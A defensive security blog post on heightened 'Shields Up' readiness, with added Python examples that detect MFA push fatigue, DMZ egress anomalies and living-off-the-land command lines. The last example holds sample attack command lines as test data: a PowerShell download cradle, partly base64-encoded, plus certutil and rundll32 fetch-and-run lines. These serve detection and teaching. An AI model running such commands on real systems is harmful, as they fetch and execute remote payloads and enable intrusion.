The world has watched as the conflict unfolded in Ukraine. With the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and other government entities around the world urging organizations to adopt a full “Shields Up” posture, the information security community continues to watch for fallout from the ever-changing conflict between Russia and Ukraine.
CISA has provided some key things to focus on, highlighting areas that may be targeted due to the conflict. As the world continues to prepare for cyber warfare, organizations that are not directly tied to or located in Ukraine should still consider following CISA’s direction to maintain heightened security measures—starting immediately.
During this heightened security period, your incident response team will likely need to operate faster than it ever has. The key is not to panic, and to accept that, given the state of things, you may not be able to prevent every incident. Doing the heavy lifting now, however, will help you detect attackers earlier and slow them down once they are in.
Start with Your External Perimeter and Work Inward
This is a solid sequence of events to implement:
- Validate your IP space and externally facing footprint. This should always be a priority, but is now more crucial than ever. If you aren’t actively looking for ways in, someone else is, and this isn’t the best time to find out someone has knocked the door down. Verify you know about all of your entry points, including:
- Cloud technology (e.g., M365, web portals to VDI environments, password reset portals)
- Third-party applications
- VPN/RDP/VDI entry points
- Bring Your Own Device (BYOD). This is a great time to double-check the access BYOD devices have within your environment and the type of data and telemetry you’ll be able to gather in the event of an intrusion.
- Do these systems have endpoint detection and response (EDR) coverage? If that is not possible, consider leveraging user behavior analytics tools to identify BYOD devices operating outside their normal business activity.
- Is there a way to associate BYOD devices with end users via a Mobile Device Management (MDM) tool or other means in the event of suspicious activity?
- Verify that all external services require some form of multi-factor authentication (MFA). MFA adds a layer of protection to these entry points, but not every MFA method is equal. Given the heightened threat, this is a good time to disable simple push-to-approve prompts (or require number matching instead). Attackers abuse push notifications by spamming authentication requests (“MFA fatigue” or “push bombing”) until a worn-down user approves one and unwittingly completes the authentication step for the attacker.
- Consider adding an extra step to your password reset or MFA enrollment process. A number of organizations allow helpdesk/call center teams to assist users in password resets and enrolling new devices for MFA. Consider adding a “call back” process to establish that the individual calling is in fact the individual who owns the account.
- Verify that all network communications flow through your network security appliances. Validate that your environment has a strong barrier between itself and the greater internet. Start by verifying that domain controllers and other servers do not have direct internet access. Verify that all network traffic, including VPN traffic, passes through the firewall. If a proxy is used within the environment, verify that all devices are required to use it and that the proxy’s own traffic is also subject to the firewall.
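As an added example (not code from the original post), the MFA-fatigue pattern described above can be detected in your identity provider’s logs: a burst of push prompts that the user denies or ignores, followed by an approval. The log format, field names and the sample events below are constructed for illustration; map them to whatever your IdP actually emits.

```python
"""Flag MFA push-fatigue patterns in authentication logs.

Added example (not from the original post). The log format, field names
and SAMPLE_LOG below are constructed; adapt parse_events() to your IdP.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one push event per line, "timestamp user result source_ip".
# result is APPROVED, DENIED or TIMEOUT (the user ignored the prompt).
SAMPLE_LOG = """\
2022-03-01T02:10:01Z alice TIMEOUT 203.0.113.7
2022-03-01T02:10:35Z alice DENIED 203.0.113.7
2022-03-01T02:11:02Z alice TIMEOUT 203.0.113.7
2022-03-01T02:11:40Z alice DENIED 203.0.113.7
2022-03-01T02:12:15Z alice APPROVED 203.0.113.7
2022-03-01T09:00:10Z bob APPROVED 198.51.100.20
2022-03-01T13:30:00Z carol DENIED 192.0.2.5
2022-03-01T13:45:00Z carol APPROVED 198.51.100.21
"""


def parse_events(text):
    """Parse the constructed log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, result, src = line.split()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user,
            "result": result,
            "src": src,
        })
    return events


def find_push_fatigue(events, window=timedelta(minutes=10), threshold=3):
    """Return one finding per user who received `threshold` or more
    unapproved push prompts inside `window`. The finding also records
    whether an APPROVED follows the burst, which is the worst case: it
    means the user eventually gave in and let the attacker through."""
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_user[e["user"]].append(e)

    findings = []
    for user, evs in by_user.items():
        unapproved = [e for e in evs if e["result"] != "APPROVED"]
        # Slide a window over the unapproved prompts only.
        for i in range(len(unapproved)):
            start = unapproved[i]["ts"]
            burst = [e for e in unapproved[i:] if e["ts"] - start <= window]
            if len(burst) >= threshold:
                burst_end = burst[-1]["ts"]
                approved_after = any(
                    e["result"] == "APPROVED"
                    and burst_end <= e["ts"] <= burst_end + window
                    for e in evs
                )
                findings.append({
                    "user": user,
                    "first_prompt": start,
                    "prompts": len(burst),
                    "sources": sorted({e["src"] for e in burst}),
                    "approved_after_burst": approved_after,
                })
                break  # one finding per user is enough to trigger a response
    return findings


if __name__ == "__main__":
    for finding in find_push_fatigue(parse_events(SAMPLE_LOG)):
        print(finding)
```

In the constructed sample only alice trips the rule: four ignored or denied prompts in under two minutes, then an approval. Treat a finding with `approved_after_burst` set as a probable account compromise, not just a nuisance, and reset the credential and MFA enrollment rather than only notifying the user.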
Once that visibility and additional controls are put into place, take a serious look at the logging capabilities throughout your environment.
Verify Proper Logging and Monitoring
Top areas to consider here include:
- Firewalls. Verify that the logs are tracking the bytes transferred in and out; source IP; destination IP; ports; and if possible, URIs/user agents, and so on.
- VPNs. Verify that the source IPs are being captured in the logs. It’s important to track where logins are coming from. Also, verify that the destination IPs, or the hosts internal to the network, are logged.
- MFA/device additions. Verify that you log when new devices are enrolled in your MDM (with the associated hostname and system information) and when new devices are enrolled for a user’s MFA.
- DNS and DHCP. Verify that both are logging to a centralized server and that the retention for these logs has been increased. When captured only on the endpoints themselves, these logs expire quickly.
- Proxy logs. Verify that URIs are being captured and, if possible, that SSL/TLS communications are being inspected. This can help uncover encrypted communications leveraged by attackers for command and control.
- DMZ (if applicable). Logging these will help identify if DMZ systems are initiating outbound communications. This, ideally, shouldn’t be happening, but depending on the environment, file transfers and things like email and web servers may generate this traffic. Verify behavior against historical norms.
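Two of the checks above (outbound connections initiated by DMZ hosts, and firewall byte counts compared against historical norms) are easy to script once the logs are centralized. The following is an added example, not code from the original post: the DMZ and internal subnets, the egress allowlist, the per-host baselines and the log lines are all constructed for illustration, and a real firewall export carries many more fields than the four used here.

```python
"""Two checks over firewall connection logs (added example, not from the
original post): DMZ hosts initiating outbound connections that are not
on their allowlist, and hosts whose outbound byte volume is far above
their historical norm. All subnets, allowlist entries, baselines and log
lines below are constructed.
"""
import ipaddress
from collections import defaultdict

DMZ = ipaddress.ip_network("192.0.2.0/24")       # constructed DMZ range
INTERNAL = ipaddress.ip_network("10.0.0.0/8")    # constructed internal range

# Destinations a DMZ host is expected to reach (e.g. mail relay, update mirror).
DMZ_EGRESS_ALLOWLIST = {"198.51.100.25:25", "198.51.100.80:443"}

# Constructed sample lines: "src dst dport bytes_out", one per connection
# initiated by src.
SAMPLE_LOG = """\
192.0.2.10 198.51.100.25 25 4096
192.0.2.10 203.0.113.99 443 9000000
192.0.2.20 198.51.100.80 443 120000
10.1.5.7 203.0.113.5 443 52000
10.1.5.7 203.0.113.6 443 150000000
10.1.9.9 203.0.113.5 443 30000
"""

# Constructed historical norm: average daily bytes out per host.
BASELINE_BYTES_OUT = {
    "192.0.2.10": 50_000,
    "192.0.2.20": 100_000,
    "10.1.5.7": 2_000_000,
    "10.1.9.9": 40_000,
}


def parse_log(text):
    """Parse the constructed format into (src, dst, dport, bytes_out) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, dst, dport, nbytes = line.split()
        rows.append((ipaddress.ip_address(src), ipaddress.ip_address(dst),
                     int(dport), int(nbytes)))
    return rows


def dmz_outbound_violations(rows):
    """DMZ-initiated connections leaving the DMZ/internal ranges that are
    not explicitly allowlisted. Documentation ranges are used as 'internet'
    addresses here, so membership is tested against our own networks rather
    than via ipaddress.is_private()."""
    hits = []
    for src, dst, dport, _ in rows:
        if src in DMZ and dst not in INTERNAL and dst not in DMZ:
            if f"{dst}:{dport}" not in DMZ_EGRESS_ALLOWLIST:
                hits.append((str(src), str(dst), dport))
    return hits


def egress_volume_anomalies(rows, baseline, factor=10):
    """Hosts whose total bytes out in this log exceed factor x their baseline,
    plus hosts with no baseline at all (new or unknown systems)."""
    totals = defaultdict(int)
    for src, _, _, nbytes in rows:
        totals[str(src)] += nbytes
    anomalies = []
    for host, total in totals.items():
        norm = baseline.get(host)
        if norm is None:
            anomalies.append((host, total, "no baseline"))
        elif total > factor * norm:
            anomalies.append((host, total, f"{total / norm:.0f}x baseline"))
    return anomalies


if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    print("DMZ egress violations:", dmz_outbound_violations(rows))
    print("Volume anomalies:", egress_volume_anomalies(rows, BASELINE_BYTES_OUT))
```

In the sample, the DMZ host 192.0.2.10 both talks to an unapproved external address and pushes roughly 180 times its normal daily volume, which is exactly the combination (unexpected outbound session plus large transfer) that precedes data theft or staging for ransomware. The factor is deliberately coarse; a real deployment would baseline per day of week and alert on destinations as well as volume.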
Internal Areas to Track
Don’t forget the danger to your internal systems, including:
- Active Directory. Verify that your user base has been audited for over-privileged users, that inactive users have been disabled, and that old users and computer objects have been removed.
- Passwords. Enforce password complexity and limit reuse of passwords. Verify that you have a process in place to perform an enterprise password reset if necessary. Develop that plan, including proper communications protocols, if this process doesn’t exist.
- Containment. Identify a way to perform both network isolation and host isolation within the network to contain suspicious activity—ideally without losing visibility for forensics and threat hunting. Have a process to isolate with a tool (such as EDR) or a formal process to move systems to an isolated network.
- Command line/script logging. PowerShell logging has become more robust over the years and provides a wealth of information. Similarly, process command-line logging can highlight Living off the Land (LOTL) techniques, which are favored not only by cyber espionage actors but also by ransomware affiliates. Check out the presentation by Daniel Bohannon and Matthew Dunwoody that walks through how to build security processes that detect methodology-based attacks like LOTL, rather than relying solely on the signature-based detections that most antivirus (AV) and other security tools depend on.
- Create an allowlist of what is expected and should be considered normal within the environment. Windows Defender Application Control is effective for Windows environments. For Linux environments, auditd can be leveraged for continuous monitoring. EDR tools can also provide components that help with this monitoring.
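The “methodology-based” idea from the command-line logging item above can be illustrated with a small scorer that looks at what a command line does (fetch, decode, execute, hide) rather than at any one signature. This is an added example, not code from the original post or from the cited talk: the indicator list, weights, threshold and sample command lines are constructed and deliberately small, and the encoded command is generated inside the block exactly as `powershell -EncodedCommand` expects it (base64 of UTF-16LE), so the example is self-contained.

```python
"""Methodology-based scoring of command lines for living-off-the-land
indicators. Added example, not from the original post or the cited talk;
INDICATORS, weights and SAMPLE_COMMANDS are constructed and should be
tuned to your own allowlist.
"""
import base64
import binascii
import re

# (name, regex, weight). Weights are illustrative, not calibrated.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I), 3),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("bypass_policy", re.compile(r"-ep\s+bypass|-ExecutionPolicy\s+bypass", re.I), 1),
    ("certutil_fetch", re.compile(r"certutil(\.exe)?\s+.*-urlcache", re.I), 3),
    ("mshta_or_rundll32_script", re.compile(r"(mshta|rundll32)(\.exe)?\s+.*(javascript:|vbscript:|http)", re.I), 3),
    ("wmic_process_create", re.compile(r"wmic(\.exe)?\s+.*process\s+call\s+create", re.I), 2),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or
    None if there is none or it does not decode cleanly."""
    m = re.search(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_command_line(cmdline):
    """Score one command line. The decoded payload of an encoded command is
    scored as well, so base64 does not hide the cradle inside it."""
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        texts.append(decoded)
    hits, score = [], 0
    for name, rx, weight in INDICATORS:
        if any(rx.search(t) for t in texts):
            hits.append(name)
            score += weight
    return {"score": score, "indicators": hits, "decoded": decoded}


def triage(commands, threshold=3):
    """Return (cmdline, result) for every command scoring >= threshold."""
    flagged = []
    for cmd in commands:
        result = score_command_line(cmd)
        if result["score"] >= threshold:
            flagged.append((cmd, result))
    return flagged


# Constructed sample: a download cradle, encoded the way -enc expects it.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()

SAMPLE_COMMANDS = [
    "powershell.exe -w hidden -ep bypass -enc " + ENCODED,
    "certutil.exe -urlcache -split -f http://203.0.113.5/x.exe C:\\Users\\Public\\x.exe",
    "powershell.exe -Command Get-Service -Name Spooler",
    "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();",
]

if __name__ == "__main__":
    for cmd, result in triage(SAMPLE_COMMANDS):
        print(result["score"], result["indicators"], cmd[:60])
```

The benign `Get-Service` line scores zero while the three LOTL lines score 3 or more, and the encoded one scores highest because its decoded payload adds the cradle and `IEX` indicators on top of the hidden window and policy bypass. Note that every tool here (powershell, certutil, rundll32) is a legitimate signed binary, which is why an allowlist of expected parent processes and arguments, rather than file hashes, is what makes this kind of detection tractable.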
Be Over-Cautious
Consider taking a very conservative approach to what is allowed in and out of the network. LOTL attacks are designed to bypass AV tools, and they are also effective at evading other security tools such as EDR.
They allow an attacker to blend in with the rest of the environment because they use legitimate, built-in operating system tools, often in ways their designers never intended, rather than dropping malware or exploiting a vulnerability to carry out the attacker’s actions. Taking a conservative approach will not only limit the attack surface during this heightened security period, but will also make new suspicious activity within the environment easier to spot.
Look Into Insurance
Finally, consider discussing with cyber insurance about the different options available, including what’s covered; what priority your organization will have in case of attack; and what incident response (IR) vendors are available to you.
Unfortunately, for the foreseeable future, the volume of cyber-related incidents will likely be overwhelming. Having these serious talks now will aid in the long run.